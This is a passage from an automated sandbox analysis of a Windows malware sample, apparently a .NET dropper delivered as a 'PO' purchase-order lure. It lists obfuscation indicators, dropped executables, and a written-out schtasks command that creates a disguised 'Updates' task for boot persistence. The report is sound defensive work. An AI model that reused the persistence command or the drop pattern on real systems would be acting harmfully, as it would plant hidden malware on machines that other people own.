                    Source: owKQ0b029a.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                    Source: owKQ0b029a.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                    Source: owKQ0b029a.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                    Source: owKQ0b029a.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                    Source: owKQ0b029a.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                    Data Obfuscation

                    barindex
                    Source: PO.exe.0.dr, CalculatorMain.cs.Net Code: InitializeComponent System.AppDomain.Load(byte[])
                    Source: QntRsaVyLKlY.exe.7.dr, CalculatorMain.cs.Net Code: InitializeComponent System.AppDomain.Load(byte[])
                    Source: 7.2.PO.exe.7500000.7.raw.unpack, IrbWprQUijEdHaKwJB.cs.Net Code: xQuv9J7gZ6 System.Reflection.Assembly.Load(byte[])
                    Source: 7.2.PO.exe.43a4cc0.4.raw.unpack, IrbWprQUijEdHaKwJB.cs.Net Code: xQuv9J7gZ6 System.Reflection.Assembly.Load(byte[])
                    Source: 7.2.PO.exe.43feae0.1.raw.unpack, IrbWprQUijEdHaKwJB.cs.Net Code: xQuv9J7gZ6 System.Reflection.Assembly.Load(byte[])
                    Source: C:\Users\user\Desktop\owKQ0b029a.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\__tmp_rar_sfx_access_check_5598984Jump to behavior
                    Source: C:\Users\user\Desktop\owKQ0b029a.exeCode function: 0_2_00C82846 push ecx; ret 0_2_00C82859
                    Source: C:\Users\user\Desktop\owKQ0b029a.exeCode function: 0_2_00C81B98 push eax; ret 0_2_00C81BB6
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeCode function: 15_2_06ACE5CF push es; ret 15_2_06ACE5E0
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeCode function: 15_2_06AC1810 push es; ret 15_2_06AC1820
                    Source: PO.exe.0.drStatic PE information: section name: .text entropy: 7.901834215729053
                    Source: QntRsaVyLKlY.exe.7.drStatic PE information: section name: .text entropy: 7.901834215729053
                    Source: 7.2.PO.exe.7500000.7.raw.unpack, RweiFQ8MNVqb7kU3qP.csHigh entropy of concatenated method names: 'jSqyx8fSBd', 'A41yCp0K6R', 'ToString', 'w4fy3q05Db', 'jU2y1ngNhh', 'kZgyUhWV0S', 'PBaycnNhYC', 'hODyYXUcJX', 'wkxy76mi1A', 'wQeyQGwGrq'
                    Source: 7.2.PO.exe.7500000.7.raw.unpack, LKQT68mH5ASHthJwl3.csHigh entropy of concatenated method names: 'hdNJAM6wC7', 'MksJ64gGyW', 'aXvJG8IDAW', 'wuAJwlH512', 'KdbJZoOywH', 'NY2JOvRyLh', 'mZjJuYIxhT', 'nW5JVTTTNu', 'l8TJnANFOX', 'vcUJDLQ0dI'
                    Source: 7.2.PO.exe.7500000.7.raw.unpack, DgMo1a2TEnBVuP9N9q.csHigh entropy of concatenated method names: 'mgOyPih1ab', 'wF2yEVJpLK', 'sDNR4wS2Un', 'f6xRXlQseZ', 'vWDyDVtyQ6', 'L2yy0h3Hnv', 'UZQymixqZR', 'H10ytw8doO', 'i7SygBVJxq', 'PeTyk2EmFt'
                    Source: 7.2.PO.exe.7500000.7.raw.unpack, x3jKeUAdnBO4kHagia.csHigh entropy of concatenated method names: 'd4i1td3XwD', 'eaf1gosTFY', 'tWW1koOaXv', 'hiD189ZWv6', 'kGi1sJd5Lg', 'Pmb126vSLo', 'PFs1qNrinI', 'tdo1Po6afc', 'FqO1rxc7un', 'Mgl1E4aAZM'
                    Source: 7.2.PO.exe.7500000.7.raw.unpack, BcPGxJGNwBKAHLOZ5B.csHigh entropy of concatenated method names: 'WSyYpAJOyI', 'TE6Y1kYrEl', 'EXDYcF7Rqh', 'RCVY78qk4x', 'zv4YQ91o7S', 'AJlcsOZwLV', 'JW8c2tZYXs', 'tDxcqkSLic', 'wxJcPRWv01', 'CwZcrlJ3VV'
                    Source: 7.2.PO.exe.7500000.7.raw.unpack, DN1BMmUSUujPnlpeUe.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'TvWLrFLTsu', 'qcsLEHEbid', 'SB7LzW5q1B', 'Mtsj4RkLWC', 'VBhjXS8bJN', 'P9wjLBx7o7', 'EgpjjJDpK7', 'RxNZgl4Irbd6PbUn9ni'
                    Source: 7.2.PO.exe.7500000.7.raw.unpack, eiSH7gzGM2qUasCfST.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'xbVMJEZEYQ', 'aoyMb9sZbR', 'VZoMea5cuH', 'YQ6MytHiSY', 'DDeMRqZgA5', 'wLPMMn3MQ7', 'AQEMWhaliT'
                    Source: 7.2.PO.exe.7500000.7.raw.unpack, OXOCYHtTvwly4MyDvr.csHigh entropy of concatenated method names: 'OSpbn7OWGX', 'JKjb0evbRq', 'aExbtwro56', 'LYZbgpvCrI', 'Nekbw7nYsf', 'I5Qb5d8Hiy', 'nCobZgEf90', 'JQBbOHf9Pe', 'hQIba2mfqf', 'T1EbusIVWx'
                    Source: 7.2.PO.exe.7500000.7.raw.unpack, UcoK1FuF7y8QYluRJb.csHigh entropy of concatenated method names: 'QL473lh3MT', 'GBu7UpGCZ7', 'eAM7Y9TSc4', 'Qa2YE8lWLd', 'HqtYz2n4Fu', 'gkB74jwsIX', 'Rwh7XHnY6s', 'uId7LmCSnW', 'VIe7jc3kcc', 'k0R7vcAG8q'
                    Source: 7.2.PO.exe.7500000.7.raw.unpack, Gov6glwCQ97H0Limap.csHigh entropy of concatenated method names: 'VuIG52oSRQeseG4Mn2S', 'GlXTSqoD9V3brRrr2OQ', 'uq3bGBoLvTrZu9Cr1o6', 'GkkYR3UgYE', 'Jw2YMlS89Y', 'v9yYWL7S66', 'Xj8jsCo0i4wgrGl7P2J', 'X0QvNxoJ5yEiaHtlmqU'
                    Source: 7.2.PO.exe.7500000.7.raw.unpack, IrbWprQUijEdHaKwJB.csHigh entropy of concatenated method names: 'LoTjpQ6gm0', 'H5Dj3Glilr', 'Wvgj1U7ZrV', 'EwRjUJrAfJ', 'tgpjc4WWQK', 'JWhjYEatKA', 'yisj7re6Cn', 'aFwjQDXJ6W', 'EY9jioN6jG', 'toQjxSAuK1'
                    Source: 7.2.PO.exe.7500000.7.raw.unpack, B2Ep1wrKg8qEfTObHH.csHigh entropy of concatenated method names: 'PjpRGnFayt', 'e5aRwmAd3B', 'aLPR5v1ZeO', 'BRtRZIUA8O', 'SKkRtGRB3V', 'fEGROaOWxa', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 7.2.PO.exe.7500000.7.raw.unpack, mBUeiAkjcrgNLlTDqo.csHigh entropy of concatenated method names: 'ToString', 'x8leDYyk1d', 'fanewSqf8H', 'ICUe59hlfc', 'uMdeZXqNUL', 'LaVeOH735h', 'QxNeamDkG4', 'Fpbeu8vZ3N', 'U3keVVD1h0', 'ovGeTjW7PX'
                    Source: 7.2.PO.exe.7500000.7.raw.unpack, I9emTW1si3A509cO3Q.csHigh entropy of concatenated method names: 'Dispose', 'h6AXrSWDNA', 'j9JLwyc7oe', 'H9qffBn4X4', 'Dr7XEyD28H', 'EDpXzQUWbI', 'ProcessDialogKey', 'oSKL42Ep1w', 'Bg8LXqEfTO', 'oHHLL6ZIQH'
                    Source: 7.2.PO.exe.7500000.7.raw.unpack, Y7yD28PH6DpQUWbIbS.csHigh entropy of concatenated method names: 'o1eR3kU3kg', 'ufnR1s1dq2', 'SPXRUifJEn', 'agdRcpL6R8', 'jT6RYAmEpE', 'W1qR7eXgLu', 'i9DRQHj4QV', 'Vj3Riu7y1a', 'hQtRxMWpWc', 'oldRC69IXN'
                    Source: 7.2.PO.exe.7500000.7.raw.unpack, htcMop69blRljZCVu8.csHigh entropy of concatenated method names: 'E8BUBK0qTJ', 'IH1USyhZn5', 'P8lUAcYIbw', 'URUU6NeM6h', 'pM9UbWPbyw', 'gr3UefmcYE', 'WwWUyHuJed', 'JBqURnCNZy', 'kZLUM5wJBd', 'HoZUW638p7'
                    Source: 7.2.PO.exe.7500000.7.raw.unpack, kB1m3iLkQwbft8i78e.csHigh entropy of concatenated method names: 'kR69R5CMS', 'WpCBIMyj8', 'iHuSnKcVp', 'eZ2hlR9Go', 'So76utccw', 'R4edmi8Ny', 'fhRqvwyWuxLCkWGH9Z', 'iSm30QC0X5lFtUgo9H', 'd0XRTetyR', 'S0jWJdMsR'
                    Source: 7.2.PO.exe.7500000.7.raw.unpack, NRIjW9Tc0VVQBypkJ3.csHigh entropy of concatenated method names: 'kvI7oIDyyS', 't8Y7N7Jo72', 'aIo79EToFP', 'Fne7BOZmJ4', 'AVV7KSV51w', 'RdT7SedPVd', 'Fny7hHAc7N', 'flI7A6chGO', 'yES76s7JhA', 'j8R7dmoFU0'
                    Source: 7.2.PO.exe.7500000.7.raw.unpack, PRxlWidxa1R4F3MMQC.csHigh entropy of concatenated method names: 'C3ycKA7fKo', 'vLlchqxXgE', 'Wq6U5tSWpq', 'rQVUZ2iuNe', 'aWOUOew3VU', 'cbCUaeabhy', 'kgZUu99wFF', 'pSuUVParlW', 'QfJUTYPs7C', 'gFIUn9L3V8'
                    Source: 7.2.PO.exe.7500000.7.raw.unpack, ci7MkkvfGKgms55ENS.csHigh entropy of concatenated method names: 'FEoX73jKeU', 'FnBXQO4kHa', 'e9bXxlRljZ', 'nVuXC80Rxl', 'fMMXbQCScP', 'GxJXeNwBKA', 'eYSb8ZNOmDmuQd0ehj', 'CaXEPP2XPThNe5eC4E', 'pvIXX9CopU', 'O3tXjvxuBm'
                    Source: 7.2.PO.exe.7500000.7.raw.unpack, To5JpVX4YjBwk1ElpU2.csHigh entropy of concatenated method names: 'KtnMoYck7s', 'wWSMNkp0nZ', 'svIM9Z8I04', 'HWuMBEIEB8', 'O6pMKyU2S7', 'oNkMSxtEIs', 'QGZMhZSZT6', 'SflMAO0Htg', 'EfMM6hiHum', 'ci4Mdm7B7N'
                    Source: 7.2.PO.exe.7500000.7.raw.unpack, jsZrdcXjl1uQRqsAmCA.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'eP3WtPjbth', 'u5PWgiBP9F', 'jS7WkXqpW7', 'wieW8OqtVD', 'BliWsFph5g', 'WqMW2DmGNC', 'f3uWqc984l'
                    Source: 7.2.PO.exe.7500000.7.raw.unpack, EZIQHCEbc1PaX9Yb1N.csHigh entropy of concatenated method names: 'VdkMX3Swpu', 'YXwMjQmwEJ', 'MUxMvxuQXa', 'JpjM3TuveX', 'OuyM1BbOtN', 'OrjMcG3AW3', 'D8PMYcspNM', 'OhJRqFjmO9', 'u0oRPfhnor', 'iVgRra9dkl'
                    Source: 7.2.PO.exe.43a4cc0.4.raw.unpack, RweiFQ8MNVqb7kU3qP.csHigh entropy of concatenated method names: 'jSqyx8fSBd', 'A41yCp0K6R', 'ToString', 'w4fy3q05Db', 'jU2y1ngNhh', 'kZgyUhWV0S', 'PBaycnNhYC', 'hODyYXUcJX', 'wkxy76mi1A', 'wQeyQGwGrq'
                    Source: 7.2.PO.exe.43a4cc0.4.raw.unpack, LKQT68mH5ASHthJwl3.csHigh entropy of concatenated method names: 'hdNJAM6wC7', 'MksJ64gGyW', 'aXvJG8IDAW', 'wuAJwlH512', 'KdbJZoOywH', 'NY2JOvRyLh', 'mZjJuYIxhT', 'nW5JVTTTNu', 'l8TJnANFOX', 'vcUJDLQ0dI'
                    Source: 7.2.PO.exe.43a4cc0.4.raw.unpack, DgMo1a2TEnBVuP9N9q.csHigh entropy of concatenated method names: 'mgOyPih1ab', 'wF2yEVJpLK', 'sDNR4wS2Un', 'f6xRXlQseZ', 'vWDyDVtyQ6', 'L2yy0h3Hnv', 'UZQymixqZR', 'H10ytw8doO', 'i7SygBVJxq', 'PeTyk2EmFt'
                    Source: 7.2.PO.exe.43a4cc0.4.raw.unpack, x3jKeUAdnBO4kHagia.csHigh entropy of concatenated method names: 'd4i1td3XwD', 'eaf1gosTFY', 'tWW1koOaXv', 'hiD189ZWv6', 'kGi1sJd5Lg', 'Pmb126vSLo', 'PFs1qNrinI', 'tdo1Po6afc', 'FqO1rxc7un', 'Mgl1E4aAZM'
                    Source: 7.2.PO.exe.43a4cc0.4.raw.unpack, BcPGxJGNwBKAHLOZ5B.csHigh entropy of concatenated method names: 'WSyYpAJOyI', 'TE6Y1kYrEl', 'EXDYcF7Rqh', 'RCVY78qk4x', 'zv4YQ91o7S', 'AJlcsOZwLV', 'JW8c2tZYXs', 'tDxcqkSLic', 'wxJcPRWv01', 'CwZcrlJ3VV'
                    Source: 7.2.PO.exe.43a4cc0.4.raw.unpack, DN1BMmUSUujPnlpeUe.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'TvWLrFLTsu', 'qcsLEHEbid', 'SB7LzW5q1B', 'Mtsj4RkLWC', 'VBhjXS8bJN', 'P9wjLBx7o7', 'EgpjjJDpK7', 'RxNZgl4Irbd6PbUn9ni'
                    Source: 7.2.PO.exe.43a4cc0.4.raw.unpack, eiSH7gzGM2qUasCfST.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'xbVMJEZEYQ', 'aoyMb9sZbR', 'VZoMea5cuH', 'YQ6MytHiSY', 'DDeMRqZgA5', 'wLPMMn3MQ7', 'AQEMWhaliT'
                    Source: 7.2.PO.exe.43a4cc0.4.raw.unpack, OXOCYHtTvwly4MyDvr.csHigh entropy of concatenated method names: 'OSpbn7OWGX', 'JKjb0evbRq', 'aExbtwro56', 'LYZbgpvCrI', 'Nekbw7nYsf', 'I5Qb5d8Hiy', 'nCobZgEf90', 'JQBbOHf9Pe', 'hQIba2mfqf', 'T1EbusIVWx'
                    Source: 7.2.PO.exe.43a4cc0.4.raw.unpack, UcoK1FuF7y8QYluRJb.csHigh entropy of concatenated method names: 'QL473lh3MT', 'GBu7UpGCZ7', 'eAM7Y9TSc4', 'Qa2YE8lWLd', 'HqtYz2n4Fu', 'gkB74jwsIX', 'Rwh7XHnY6s', 'uId7LmCSnW', 'VIe7jc3kcc', 'k0R7vcAG8q'
                    Source: 7.2.PO.exe.43a4cc0.4.raw.unpack, Gov6glwCQ97H0Limap.csHigh entropy of concatenated method names: 'VuIG52oSRQeseG4Mn2S', 'GlXTSqoD9V3brRrr2OQ', 'uq3bGBoLvTrZu9Cr1o6', 'GkkYR3UgYE', 'Jw2YMlS89Y', 'v9yYWL7S66', 'Xj8jsCo0i4wgrGl7P2J', 'X0QvNxoJ5yEiaHtlmqU'
                    Source: 7.2.PO.exe.43a4cc0.4.raw.unpack, IrbWprQUijEdHaKwJB.csHigh entropy of concatenated method names: 'LoTjpQ6gm0', 'H5Dj3Glilr', 'Wvgj1U7ZrV', 'EwRjUJrAfJ', 'tgpjc4WWQK', 'JWhjYEatKA', 'yisj7re6Cn', 'aFwjQDXJ6W', 'EY9jioN6jG', 'toQjxSAuK1'
                    Source: 7.2.PO.exe.43a4cc0.4.raw.unpack, B2Ep1wrKg8qEfTObHH.csHigh entropy of concatenated method names: 'PjpRGnFayt', 'e5aRwmAd3B', 'aLPR5v1ZeO', 'BRtRZIUA8O', 'SKkRtGRB3V', 'fEGROaOWxa', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 7.2.PO.exe.43a4cc0.4.raw.unpack, mBUeiAkjcrgNLlTDqo.csHigh entropy of concatenated method names: 'ToString', 'x8leDYyk1d', 'fanewSqf8H', 'ICUe59hlfc', 'uMdeZXqNUL', 'LaVeOH735h', 'QxNeamDkG4', 'Fpbeu8vZ3N', 'U3keVVD1h0', 'ovGeTjW7PX'
                    Source: 7.2.PO.exe.43a4cc0.4.raw.unpack, I9emTW1si3A509cO3Q.csHigh entropy of concatenated method names: 'Dispose', 'h6AXrSWDNA', 'j9JLwyc7oe', 'H9qffBn4X4', 'Dr7XEyD28H', 'EDpXzQUWbI', 'ProcessDialogKey', 'oSKL42Ep1w', 'Bg8LXqEfTO', 'oHHLL6ZIQH'
                    Source: 7.2.PO.exe.43a4cc0.4.raw.unpack, Y7yD28PH6DpQUWbIbS.csHigh entropy of concatenated method names: 'o1eR3kU3kg', 'ufnR1s1dq2', 'SPXRUifJEn', 'agdRcpL6R8', 'jT6RYAmEpE', 'W1qR7eXgLu', 'i9DRQHj4QV', 'Vj3Riu7y1a', 'hQtRxMWpWc', 'oldRC69IXN'
                    Source: 7.2.PO.exe.43a4cc0.4.raw.unpack, htcMop69blRljZCVu8.csHigh entropy of concatenated method names: 'E8BUBK0qTJ', 'IH1USyhZn5', 'P8lUAcYIbw', 'URUU6NeM6h', 'pM9UbWPbyw', 'gr3UefmcYE', 'WwWUyHuJed', 'JBqURnCNZy', 'kZLUM5wJBd', 'HoZUW638p7'
                    Source: 7.2.PO.exe.43a4cc0.4.raw.unpack, kB1m3iLkQwbft8i78e.csHigh entropy of concatenated method names: 'kR69R5CMS', 'WpCBIMyj8', 'iHuSnKcVp', 'eZ2hlR9Go', 'So76utccw', 'R4edmi8Ny', 'fhRqvwyWuxLCkWGH9Z', 'iSm30QC0X5lFtUgo9H', 'd0XRTetyR', 'S0jWJdMsR'
                    Source: 7.2.PO.exe.43a4cc0.4.raw.unpack, NRIjW9Tc0VVQBypkJ3.csHigh entropy of concatenated method names: 'kvI7oIDyyS', 't8Y7N7Jo72', 'aIo79EToFP', 'Fne7BOZmJ4', 'AVV7KSV51w', 'RdT7SedPVd', 'Fny7hHAc7N', 'flI7A6chGO', 'yES76s7JhA', 'j8R7dmoFU0'
                    Source: 7.2.PO.exe.43a4cc0.4.raw.unpack, PRxlWidxa1R4F3MMQC.csHigh entropy of concatenated method names: 'C3ycKA7fKo', 'vLlchqxXgE', 'Wq6U5tSWpq', 'rQVUZ2iuNe', 'aWOUOew3VU', 'cbCUaeabhy', 'kgZUu99wFF', 'pSuUVParlW', 'QfJUTYPs7C', 'gFIUn9L3V8'
                    Source: 7.2.PO.exe.43a4cc0.4.raw.unpack, ci7MkkvfGKgms55ENS.csHigh entropy of concatenated method names: 'FEoX73jKeU', 'FnBXQO4kHa', 'e9bXxlRljZ', 'nVuXC80Rxl', 'fMMXbQCScP', 'GxJXeNwBKA', 'eYSb8ZNOmDmuQd0ehj', 'CaXEPP2XPThNe5eC4E', 'pvIXX9CopU', 'O3tXjvxuBm'
                    Source: 7.2.PO.exe.43a4cc0.4.raw.unpack, To5JpVX4YjBwk1ElpU2.csHigh entropy of concatenated method names: 'KtnMoYck7s', 'wWSMNkp0nZ', 'svIM9Z8I04', 'HWuMBEIEB8', 'O6pMKyU2S7', 'oNkMSxtEIs', 'QGZMhZSZT6', 'SflMAO0Htg', 'EfMM6hiHum', 'ci4Mdm7B7N'
                    Source: 7.2.PO.exe.43a4cc0.4.raw.unpack, jsZrdcXjl1uQRqsAmCA.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'eP3WtPjbth', 'u5PWgiBP9F', 'jS7WkXqpW7', 'wieW8OqtVD', 'BliWsFph5g', 'WqMW2DmGNC', 'f3uWqc984l'
                    Source: 7.2.PO.exe.43a4cc0.4.raw.unpack, EZIQHCEbc1PaX9Yb1N.csHigh entropy of concatenated method names: 'VdkMX3Swpu', 'YXwMjQmwEJ', 'MUxMvxuQXa', 'JpjM3TuveX', 'OuyM1BbOtN', 'OrjMcG3AW3', 'D8PMYcspNM', 'OhJRqFjmO9', 'u0oRPfhnor', 'iVgRra9dkl'
                    Source: 7.2.PO.exe.43feae0.1.raw.unpack, RweiFQ8MNVqb7kU3qP.csHigh entropy of concatenated method names: 'jSqyx8fSBd', 'A41yCp0K6R', 'ToString', 'w4fy3q05Db', 'jU2y1ngNhh', 'kZgyUhWV0S', 'PBaycnNhYC', 'hODyYXUcJX', 'wkxy76mi1A', 'wQeyQGwGrq'
                    Source: 7.2.PO.exe.43feae0.1.raw.unpack, LKQT68mH5ASHthJwl3.csHigh entropy of concatenated method names: 'hdNJAM6wC7', 'MksJ64gGyW', 'aXvJG8IDAW', 'wuAJwlH512', 'KdbJZoOywH', 'NY2JOvRyLh', 'mZjJuYIxhT', 'nW5JVTTTNu', 'l8TJnANFOX', 'vcUJDLQ0dI'
                    Source: 7.2.PO.exe.43feae0.1.raw.unpack, DgMo1a2TEnBVuP9N9q.csHigh entropy of concatenated method names: 'mgOyPih1ab', 'wF2yEVJpLK', 'sDNR4wS2Un', 'f6xRXlQseZ', 'vWDyDVtyQ6', 'L2yy0h3Hnv', 'UZQymixqZR', 'H10ytw8doO', 'i7SygBVJxq', 'PeTyk2EmFt'
                    Source: 7.2.PO.exe.43feae0.1.raw.unpack, x3jKeUAdnBO4kHagia.csHigh entropy of concatenated method names: 'd4i1td3XwD', 'eaf1gosTFY', 'tWW1koOaXv', 'hiD189ZWv6', 'kGi1sJd5Lg', 'Pmb126vSLo', 'PFs1qNrinI', 'tdo1Po6afc', 'FqO1rxc7un', 'Mgl1E4aAZM'
                    Source: 7.2.PO.exe.43feae0.1.raw.unpack, BcPGxJGNwBKAHLOZ5B.csHigh entropy of concatenated method names: 'WSyYpAJOyI', 'TE6Y1kYrEl', 'EXDYcF7Rqh', 'RCVY78qk4x', 'zv4YQ91o7S', 'AJlcsOZwLV', 'JW8c2tZYXs', 'tDxcqkSLic', 'wxJcPRWv01', 'CwZcrlJ3VV'
                    Source: 7.2.PO.exe.43feae0.1.raw.unpack, DN1BMmUSUujPnlpeUe.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'TvWLrFLTsu', 'qcsLEHEbid', 'SB7LzW5q1B', 'Mtsj4RkLWC', 'VBhjXS8bJN', 'P9wjLBx7o7', 'EgpjjJDpK7', 'RxNZgl4Irbd6PbUn9ni'
                    Source: 7.2.PO.exe.43feae0.1.raw.unpack, eiSH7gzGM2qUasCfST.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'xbVMJEZEYQ', 'aoyMb9sZbR', 'VZoMea5cuH', 'YQ6MytHiSY', 'DDeMRqZgA5', 'wLPMMn3MQ7', 'AQEMWhaliT'
                    Source: 7.2.PO.exe.43feae0.1.raw.unpack, OXOCYHtTvwly4MyDvr.csHigh entropy of concatenated method names: 'OSpbn7OWGX', 'JKjb0evbRq', 'aExbtwro56', 'LYZbgpvCrI', 'Nekbw7nYsf', 'I5Qb5d8Hiy', 'nCobZgEf90', 'JQBbOHf9Pe', 'hQIba2mfqf', 'T1EbusIVWx'
                    Source: 7.2.PO.exe.43feae0.1.raw.unpack, UcoK1FuF7y8QYluRJb.csHigh entropy of concatenated method names: 'QL473lh3MT', 'GBu7UpGCZ7', 'eAM7Y9TSc4', 'Qa2YE8lWLd', 'HqtYz2n4Fu', 'gkB74jwsIX', 'Rwh7XHnY6s', 'uId7LmCSnW', 'VIe7jc3kcc', 'k0R7vcAG8q'
                    Source: 7.2.PO.exe.43feae0.1.raw.unpack, Gov6glwCQ97H0Limap.csHigh entropy of concatenated method names: 'VuIG52oSRQeseG4Mn2S', 'GlXTSqoD9V3brRrr2OQ', 'uq3bGBoLvTrZu9Cr1o6', 'GkkYR3UgYE', 'Jw2YMlS89Y', 'v9yYWL7S66', 'Xj8jsCo0i4wgrGl7P2J', 'X0QvNxoJ5yEiaHtlmqU'
                    Source: 7.2.PO.exe.43feae0.1.raw.unpack, IrbWprQUijEdHaKwJB.csHigh entropy of concatenated method names: 'LoTjpQ6gm0', 'H5Dj3Glilr', 'Wvgj1U7ZrV', 'EwRjUJrAfJ', 'tgpjc4WWQK', 'JWhjYEatKA', 'yisj7re6Cn', 'aFwjQDXJ6W', 'EY9jioN6jG', 'toQjxSAuK1'
                    Source: 7.2.PO.exe.43feae0.1.raw.unpack, B2Ep1wrKg8qEfTObHH.csHigh entropy of concatenated method names: 'PjpRGnFayt', 'e5aRwmAd3B', 'aLPR5v1ZeO', 'BRtRZIUA8O', 'SKkRtGRB3V', 'fEGROaOWxa', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 7.2.PO.exe.43feae0.1.raw.unpack, mBUeiAkjcrgNLlTDqo.csHigh entropy of concatenated method names: 'ToString', 'x8leDYyk1d', 'fanewSqf8H', 'ICUe59hlfc', 'uMdeZXqNUL', 'LaVeOH735h', 'QxNeamDkG4', 'Fpbeu8vZ3N', 'U3keVVD1h0', 'ovGeTjW7PX'
                    Source: 7.2.PO.exe.43feae0.1.raw.unpack, I9emTW1si3A509cO3Q.csHigh entropy of concatenated method names: 'Dispose', 'h6AXrSWDNA', 'j9JLwyc7oe', 'H9qffBn4X4', 'Dr7XEyD28H', 'EDpXzQUWbI', 'ProcessDialogKey', 'oSKL42Ep1w', 'Bg8LXqEfTO', 'oHHLL6ZIQH'
                    Source: 7.2.PO.exe.43feae0.1.raw.unpack, Y7yD28PH6DpQUWbIbS.csHigh entropy of concatenated method names: 'o1eR3kU3kg', 'ufnR1s1dq2', 'SPXRUifJEn', 'agdRcpL6R8', 'jT6RYAmEpE', 'W1qR7eXgLu', 'i9DRQHj4QV', 'Vj3Riu7y1a', 'hQtRxMWpWc', 'oldRC69IXN'
                    Source: 7.2.PO.exe.43feae0.1.raw.unpack, htcMop69blRljZCVu8.csHigh entropy of concatenated method names: 'E8BUBK0qTJ', 'IH1USyhZn5', 'P8lUAcYIbw', 'URUU6NeM6h', 'pM9UbWPbyw', 'gr3UefmcYE', 'WwWUyHuJed', 'JBqURnCNZy', 'kZLUM5wJBd', 'HoZUW638p7'
                    Source: 7.2.PO.exe.43feae0.1.raw.unpack, kB1m3iLkQwbft8i78e.csHigh entropy of concatenated method names: 'kR69R5CMS', 'WpCBIMyj8', 'iHuSnKcVp', 'eZ2hlR9Go', 'So76utccw', 'R4edmi8Ny', 'fhRqvwyWuxLCkWGH9Z', 'iSm30QC0X5lFtUgo9H', 'd0XRTetyR', 'S0jWJdMsR'
                    Source: 7.2.PO.exe.43feae0.1.raw.unpack, NRIjW9Tc0VVQBypkJ3.csHigh entropy of concatenated method names: 'kvI7oIDyyS', 't8Y7N7Jo72', 'aIo79EToFP', 'Fne7BOZmJ4', 'AVV7KSV51w', 'RdT7SedPVd', 'Fny7hHAc7N', 'flI7A6chGO', 'yES76s7JhA', 'j8R7dmoFU0'
                    Source: 7.2.PO.exe.43feae0.1.raw.unpack, PRxlWidxa1R4F3MMQC.csHigh entropy of concatenated method names: 'C3ycKA7fKo', 'vLlchqxXgE', 'Wq6U5tSWpq', 'rQVUZ2iuNe', 'aWOUOew3VU', 'cbCUaeabhy', 'kgZUu99wFF', 'pSuUVParlW', 'QfJUTYPs7C', 'gFIUn9L3V8'
                    Source: 7.2.PO.exe.43feae0.1.raw.unpack, ci7MkkvfGKgms55ENS.csHigh entropy of concatenated method names: 'FEoX73jKeU', 'FnBXQO4kHa', 'e9bXxlRljZ', 'nVuXC80Rxl', 'fMMXbQCScP', 'GxJXeNwBKA', 'eYSb8ZNOmDmuQd0ehj', 'CaXEPP2XPThNe5eC4E', 'pvIXX9CopU', 'O3tXjvxuBm'
                    Source: 7.2.PO.exe.43feae0.1.raw.unpack, To5JpVX4YjBwk1ElpU2.csHigh entropy of concatenated method names: 'KtnMoYck7s', 'wWSMNkp0nZ', 'svIM9Z8I04', 'HWuMBEIEB8', 'O6pMKyU2S7', 'oNkMSxtEIs', 'QGZMhZSZT6', 'SflMAO0Htg', 'EfMM6hiHum', 'ci4Mdm7B7N'
                    Source: 7.2.PO.exe.43feae0.1.raw.unpack, jsZrdcXjl1uQRqsAmCA.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'eP3WtPjbth', 'u5PWgiBP9F', 'jS7WkXqpW7', 'wieW8OqtVD', 'BliWsFph5g', 'WqMW2DmGNC', 'f3uWqc984l'
                    Source: 7.2.PO.exe.43feae0.1.raw.unpack, EZIQHCEbc1PaX9Yb1N.csHigh entropy of concatenated method names: 'VdkMX3Swpu', 'YXwMjQmwEJ', 'MUxMvxuQXa', 'JpjM3TuveX', 'OuyM1BbOtN', 'OrjMcG3AW3', 'D8PMYcspNM', 'OhJRqFjmO9', 'u0oRPfhnor', 'iVgRra9dkl'
                    Source: C:\Users\user\Desktop\owKQ0b029a.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeFile created: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeJump to dropped file

                    Boot Survival

                    barindex
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QntRsaVyLKlY" /XML "C:\Users\user\AppData\Local\Temp\tmpBBB1.tmp"

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
